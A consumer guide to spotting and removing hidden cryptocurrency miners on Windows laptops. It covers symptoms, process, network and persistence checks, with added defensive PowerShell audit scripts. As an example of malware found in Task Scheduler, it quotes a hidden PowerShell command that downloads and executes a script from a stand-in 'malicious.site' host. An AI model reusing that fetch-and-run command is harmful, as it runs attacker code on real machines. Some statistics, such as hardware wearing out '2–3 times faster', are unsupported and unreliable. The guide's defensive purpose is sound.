Have you noticed that your laptop is running slower, heating up for no reason, or running out of charge in a matter of hours? Perhaps the culprit is not battery wear or outdated hardware, but a hidden miner: malware that uses the resources of your device to mine cryptocurrency. Unlike classic viruses, miners do not steal data or block the system, but they wear out hardware 2–3 times faster than normal use.
The problem is that modern miners can masquerade as system processes, launch when Windows starts, and even bypass antivirus programs. For example, the WannaMine malware spreads through vulnerabilities in the SMB protocol (like the famous WannaCry), and XMRig can run in the background for years, mining Monero on your processor. In this article, we will look at how to identify a miner on a laptop, even if it is hidden deep in the system, and what to do to get rid of it for good.
1. Main features of a miner on a laptop
Miners do not always reveal themselves with clear symptoms, but there are 7 key signs that should raise concern. They fall into two groups: hardware and software (anomalies in the operation of the OS).
For example, if your ASUS ROG or MSI Gaming laptop suddenly starts heating up to 90–95°C while idle, this is an alarming signal. The normal idle temperature for Intel Core i7 or AMD Ryzen 7 processors is 40–50°C. An excess of 20–30°C without load almost always indicates hidden activity.
- 🔥 Overheating for no reason - the coolers are running at maximum, the case is hot, although you did not run games or render.
- 🔋 Instant battery drain — the laptop discharges in 1–2 hours instead of the usual 5–6, even in standby mode.
- 🐢 System slowdown - lags when opening folders, browser freezes, although before everything worked quickly.
- 📈 Unexplained CPU/GPU load — in the task manager, the processor or video card is loaded at 80–100% for no apparent reason.
- 🚫 Blocking updates — Windows or antivirus suddenly stopped updating (miners often disable protection).
- 🌐 Suspicious traffic - the laptop “downloads something” even when you are not using the Internet (check in Resource Monitor).
- 🔄 Spontaneous reboots - the device suddenly turns off or reboots, especially during prolonged use.
⚠️ Attention: If the laptop gets hot and slows down only when connected to charging, it may not be the miner, but a problem with the power management drivers. Check the power plan settings in Control Panel → Power Options.
2. How to check a laptop for a miner: step-by-step instructions
To confirm or refute suspicions, you need to carry out diagnostics in 4 directions: process checking, network activity analysis, virus scanning and temperature monitoring. Let's start with the simplest thing - the task manager.
Open it with the keyboard shortcut Ctrl + Shift + Esc and go to the Details tab. Sort processes by CPU or GPU load. Pay attention to:
- 🤖 Processes with strange names (for example, `svchost.exe *32` with a high load - this may be camouflage).
- 🔍 Unknown services consuming >20% of resources (for example, `Windows Update Medic Service` should not load the processor constantly).
- 🖥️ Processes related to the GPU (for example, `NVIDIA Container` or `AMD Driver` should not be busy when no game is running).
If there is nothing suspicious in the manager, go to network monitoring. Open Resource Monitor (type in Windows search) and go to the tab Network. Miners often join pools to mine cryptocurrency, so look for:
- 🌍 Connections to domains containing the words `mine`, `pool`, `crypto` (for example, `xmr.pool.minergate.com`).
- 📡 Constant outgoing traffic (even when the browser is closed).
- 🔗 Suspicious IP addresses (check via VirusTotal).
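The network check above can also be scripted. The following PowerShell is an added example, not part of the original article: it joins the DNS client cache with established TCP connections so that each connection shows its owning process, its parent process and any resolved host name containing the keywords listed above. The keyword list is the article's; the variable names and report layout are illustrative.

```powershell
# Added example. Run in an elevated PowerShell session.
# Keyword matching is a heuristic: a legitimate host with "pool" in its name
# will also be listed, so treat hits as leads to investigate, not as proof.
$keywords = 'mine', 'pool', 'crypto'
$pattern  = ($keywords | ForEach-Object { [regex]::Escape($_) }) -join '|'

# Recently resolved names that contain a keyword, with the address they resolved to.
$dnsHits = Get-DnsClientCache |
    Where-Object { $_.Entry -match $pattern -and $_.Data } |
    Select-Object Entry, Data -Unique

# Index all processes once so each connection can be mapped to image and parent.
$procs = @{}
Get-CimInstance Win32_Process | ForEach-Object { $procs[[int]$_.ProcessId] = $_ }

$report = foreach ($conn in Get-NetTCPConnection -State Established) {
    if ($conn.RemoteAddress -in '127.0.0.1', '::1') { continue }   # skip loopback
    $p      = $procs[[int]$conn.OwningProcess]
    $parent = if ($p) { $procs[[int]$p.ParentProcessId] }
    $names  = ($dnsHits | Where-Object { $_.Data -eq $conn.RemoteAddress }).Entry
    [pscustomobject]@{
        Process     = $p.Name
        PID         = $conn.OwningProcess
        Parent      = $parent.Name
        Path        = $p.ExecutablePath
        Remote      = '{0}:{1}' -f $conn.RemoteAddress, $conn.RemotePort
        KeywordHost = $names -join ', '
    }
}

# Keyword matches first, then the remaining connections grouped by process.
$report |
    Sort-Object @{ Expression = { [bool]$_.KeywordHost }; Descending = $true }, Process |
    Format-Table -AutoSize
```

A process that keeps a connection open with the browser closed, or whose `Path` is empty or points into a user-writable folder, is worth checking on VirusTotal as described above.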
3. Hidden miners: how to detect them if the antivirus is silent
Modern miners are able to bypass standard antivirus programs by masquerading as legitimate processes. For example, the PowerGhost malware uses Windows Management Instrumentation (WMI) for hidden execution, and Norman embeds itself in system services. If the usual methods don't help, try the following:
1. Check using Process Explorer (a utility from Microsoft). It shows parent processes, which helps to reveal the disguise. Download it from the official website and:
- Run `procexp.exe` as administrator.
- Press Ctrl + F and enter the name of the suspicious process.
- See which process started it (for example, if `svchost.exe` was started by `explorer.exe`, that's normal; if the parent is an unknown `servicehost.dll`, this is alarming).
2. Startup analysis. Miners often register themselves in startup so that they launch when the laptop is turned on. Check:
- 📁 The folder `C:\Users\Your_name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`.
- 🔧 The `msconfig` utility (run the command from Win + R and go to the Startup tab).
- 🖥️ Windows Registry: open `regedit` and check the branches:
  - `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run`
  - `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
3. Checking the task scheduler. Miners can be launched on a schedule. Open Task Scheduler (taskschd.msc) and check:
- 🕒 Tasks with unusual names (for example, `UpdateWindows` or `SystemOptimize`).
- 🔄 Tasks that launch `PowerShell` or `cmd.exe` with suspicious scripts.
Example of a malicious script in Task Scheduler
The malware can create a task with the command:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://malicious.site/script.ps1'))"
This command downloads and executes a script from a remote server, which then launches the miner.
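The three persistence checks in this section (Startup folder, registry Run keys, Task Scheduler) can be collected in one pass. The following PowerShell is an added example, not part of the original article; the flagging pattern is an assumption built from the switches in the command shown above (`-nop`, `-w hidden`, `IEX`, `downloadstring`).

```powershell
# Added example. Run in an elevated PowerShell session.
# A match is a reason to look closer at the entry, not proof of infection.
$suspicious = '-nop(rofile)?\b|-w(indowstyle)?\s+hidden|\bIEX\b|Invoke-Expression|downloadstring'
$entries = @()

# 1. Registry Run keys listed in step 2.
foreach ($path in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                  'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') {
    $key = Get-Item -Path $path -ErrorAction SilentlyContinue
    if (-not $key) { continue }
    foreach ($name in $key.GetValueNames()) {
        $entries += [pscustomobject]@{
            Source = $path; Name = $name; Command = [string]$key.GetValue($name)
        }
    }
}

# 2. Per-user Startup folder; shortcuts are resolved to their real target.
$shell   = New-Object -ComObject WScript.Shell
$startup = [Environment]::GetFolderPath('Startup')
foreach ($file in Get-ChildItem -Path $startup -File -ErrorAction SilentlyContinue) {
    $cmd = $file.FullName
    if ($file.Extension -eq '.lnk') {
        $lnk = $shell.CreateShortcut($file.FullName)
        $cmd = '{0} {1}' -f $lnk.TargetPath, $lnk.Arguments
    }
    $entries += [pscustomobject]@{ Source = 'Startup folder'; Name = $file.Name; Command = $cmd }
}

# 3. Scheduled tasks: every "start a program" action with its arguments.
foreach ($task in Get-ScheduledTask) {
    foreach ($action in @($task.Actions | Where-Object { $_.Execute })) {
        $entries += [pscustomobject]@{
            Source  = 'Task ' + $task.TaskPath + $task.TaskName
            Name    = $task.TaskName
            Command = '{0} {1}' -f $action.Execute, $action.Arguments
        }
    }
}

# Flag entries whose command line matches the pattern and list those first.
$entries |
    Select-Object @{ n = 'Flagged'; e = { $_.Command -match $suspicious } }, Source, Name, Command |
    Sort-Object Flagged -Descending |
    Format-Table -AutoSize -Wrap
```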
4. Top 5 utilities for finding and removing miners
If manual methods do not help, use specialized tools. Important: some miners block the installation of antivirus software, so run the utilities in safe mode (press F8 when Windows starts or use msconfig).
| Utility | What it looks for | How to use |
|---|---|---|
| Kaspersky Virus Removal Tool | Hidden miners, rootkits, trojans | Download, update databases, run full scan |
| Malwarebytes Anti-Malware | Adware, miners, spyware | Install, update, run threat scan |
| AdwCleaner | Adware and miners in the browser | Launch, click Scan, then Clear |
| GMER | Rootkits and hidden processes | Run as administrator, check the Processes tab |
| Process Hacker | Suspicious threads and DLL injections | Open, sort by CPU, check Threads |
If no utility finds the miner, but the symptoms remain, check the laptop BIOS/UEFI. Some viruses (for example, LoJax) are embedded in the motherboard firmware and survive reinstallation of Windows.
5. What to do if you find a miner: removal steps
Found a miner? Don't panic, but act quickly - some viruses may download additional modules or encrypt files. Here's the step-by-step plan:
- Turn off the Internet - this will prevent the miner from communicating with the control server.
- Create a restore point - press Win + R, enter `rstrui` and follow the instructions.
- Remove malicious processes:
  - Open Task Manager, find the suspicious process, click Open file location.
  - Delete the file and empty the Recycle Bin.
  - Check startup and task scheduler (see section 3).
If the miner has infiltrated system files and is not removed, you will have to reinstall Windows. Before this:
- 🔄 Back up important files (but don't copy `.exe` executables!).
- 💾 Download the official Windows image from the Microsoft website (use Media Creation Tool).
- 🔧 Format the `C:` drive during installation (select Custom installation).
⚠️ Attention: If after reinstalling Windows the miner appears again, this means that it is hidden in BIOS/UEFI or on another drive (for example, D:). In this case, contact a specialist - tampering with the firmware yourself can damage the laptop.
6. How to protect your laptop from miners in the future
The best defense is an integrated approach. Miners enter the system through:
- 📧 Malicious attachments in emails (for example, `.js` or `.vbs` files).
- 🌐 Infected sites (via browser exploits or advertising).
- 💾 Pirated software and cracks (often contain miners as a “bonus”).
- 🔌 Vulnerable network protocols (for example, `RDP` or `SMB`).
To minimize risks:
- Use a reliable antivirus with protection from miners (for example, Kaspersky Internet Security or Bitdefender Total Security).
- Update Windows and drivers - enable automatic updates in Settings → Update & Security.
- Block suspicious IPs via the firewall: `netsh advfirewall firewall add rule name="Block Miner Pools" dir=out action=block remoteip=144.76.0.0/16,192.99.0.0/16 enable=yes` (replace the IPs with actual pool addresses, for example, those of MinerGate or NiceHash).
- Disable unnecessary services:
  - 🔌 Remote Registry (disable in `services.msc`).
  - 🔌 Function Discovery Resource Publication (if you are not using a local network).
If you often download programs from torrents, use a sandbox (for example, Sandboxie). It isolates suspicious files from the system, and even if there is a miner in them, it will not be able to do any harm.
7. Browser mining: how to detect and block
Not all miners are installed on a laptop - some work directly in the browser via JavaScript. The most famous example is Coinhive, which mines Monero directly when you visit an infected site. Such scripts can:
- 🕵️ Use up to 80% of your CPU.
- 🕒 Work even after closing the tab (if the script is running in the background).
- 🔄 Bypass ad blockers (for example, by masquerading as legitimate analytical services).
To detect and block a browser miner:
- Open Task Manager and check the CPU load when running the browser.
- If the load is high, open your browser and press Shift + Esc (in Chrome) or Ctrl + Shift + Esc (in Firefox) - this will open the browser task manager.
- Find a tab or extension that is consuming a lot of resources and close it.
- Install extensions to block miners:
  - 🛡️ MinerBlock (for Chrome and Firefox).
  - 🛡️ NoCoin (blocks Coinhive scripts).
  - 🛡️ uBlock Origin (can block miners based on signatures).
If you often visit dubious sites (torrents, streaming platforms, hacked games), use a browser with built-in protection, for example, Brave — it blocks trackers and miners by default.
Browser miners leave no traces on the disk, but can reduce laptop performance just as much as installed viruses. Always check your CPU load when opening new tabs.
FAQ: Frequently asked questions about miners on laptops
🔍 Can a miner physically damage a laptop?
Yes. Constant load on the processor and video card leads to:
- 🔥 Overheating — Thermal paste dries out, which accelerates wear of the chips.
- 🔋 Battery degradation — discharge/charge cycles become more frequent.
- 🖥️ Reduced SSD/HDD service life - due to constant recording of temporary files.
On average, a laptop with a miner burns out 2–3 times faster than usual.
💻 Is it possible to mine on a laptop legally?
Technically yes, but it is strongly discouraged. Laptops are not designed for 24/7 workloads:
- 🔌 The power supply may not be able to withstand the increased power consumption.
- 🔥 Laptop cooling systems are weaker than those of desktop PCs - the risk of overheating is higher.
- 💰 Profitability is close to zero - electricity and wear and tear of hardware will eat up all the profit.
If you want to try it, use NiceHash or MinerGate, but limit the load to 50–60% and monitor the temperature.
🛡️ Which antivirus best detects miners?
According to AV-Comparatives tests (2023), the best results are shown by:
- Kaspersky Internet Security — detects 99% of miners, including rootkits.
- Bitdefender Total Security — effective against browser and file miners.
- ESET NOD32 — finds hidden processes and scripts well.
- Malwarebytes Premium — specializes in adware and miners.
Free versions (e.g. Avast Free) cope worse with hidden threats.
🔄 What to do if the miner returns after being deleted?
This means that:
- The virus is hidden in startup, the task scheduler or the registry (see section 3).
- Another disk (for example, `D:`) or external storage is infected.
- The miner is embedded in BIOS/UEFI (reflashing required).
- The virus spreads across the local network (check other devices).
In such cases:
- 🔧 Reinstall Windows with full formatting of the `C:` drive.
- 🔍 Check other drives with the GMER utility.
- 🔄 Update the BIOS from the official website of the laptop manufacturer.
📱 Can the miner be on a MacBook?
Yes, although less often. For macOS there are miners that exploit vulnerabilities in:
- 🍎 Gatekeeper (protection against untrusted software).
- 🔓 Xcode (if you installed pirated versions).
- 🌐 Safari (via malicious extensions).
To check, use:
- Malwarebytes for Mac.
- Avast Security for Mac.
- The built-in Activity Monitor utility (analogous to Task Manager).